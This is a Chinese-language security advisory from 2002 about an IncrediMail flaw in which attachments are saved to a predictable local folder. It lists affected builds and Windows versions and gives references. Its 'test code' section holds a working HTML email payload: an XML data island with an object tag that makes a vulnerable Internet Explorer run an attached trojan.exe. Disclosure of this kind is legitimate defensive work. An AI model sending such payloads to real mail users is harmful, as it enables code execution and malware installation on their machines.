|
|
IncrediMail Ltd. IncrediMail附件可定位漏洞
发布时间:2002-03-19
更新时间:2002-03-19
严重程度:中
威胁程度:服务器信息泄露
错误类型:设计错误
利用方式:服务器模式
BUGTRAQ ID:4297
受影响系统IncrediMail Ltd. IncrediMail 0.0Build 618
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home 0.0
IncrediMail Ltd. IncrediMail 0.0Build 560
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home 0.0
IncrediMail Ltd. IncrediMail 0.0Build 1400185
- Microsoft Windows 2000 Professional 0.0
- Microsoft Windows 2000 Professional 0.0SP1
- Microsoft Windows 2000 Professional 0.0SP2
- Microsoft Windows 95 0.0
- Microsoft Windows 98 0.0
- Microsoft Windows ME 0.0
- Microsoft Windows NT Workstation 4.0
- Microsoft Windows NT Workstation 4.0SP1
- Microsoft Windows NT Workstation 4.0SP2
- Microsoft Windows NT Workstation 4.0SP3
- Microsoft Windows NT Workstation 4.0SP4
- Microsoft Windows NT Workstation 4.0SP5
- Microsoft Windows NT Workstation 4.0SP6
- Microsoft Windows NT Workstation 4.0SP6a
- Microsoft Windows XP Home 0.0 详细描述
Incredimail是一款基于WINDOWS的EMAIL可客户端,支持声音,动画,背景等功能。
其中在一些版本的Incredimail中存在漏洞,当程序接收到包含文件附件的邮件时,文件自动存储在可预测本地系统位置上,攻击者可以利用这个漏洞发起进一步的攻击。
测试代码
发送如下HTML邮件可导致有漏洞的IE执行附件:
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>
<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="C:/Program Files/IncrediMail/Data/Identities/{42D00B20-479C-11d4-9706-00105A40931C}/Message Store/Attachments/trojan.exe"></object>
]]>
</exploit>
</security>
</xml>
解决方案
尚无
相关信息
Eric DETOISIEN <eric.detoisien@global-secure.fr
参考:http://online.securityfocus.com/archive/1/262262
http://www.securityfocus.com/bid/3867
相关主页:http://www.incredimail.com/english/index.html
|
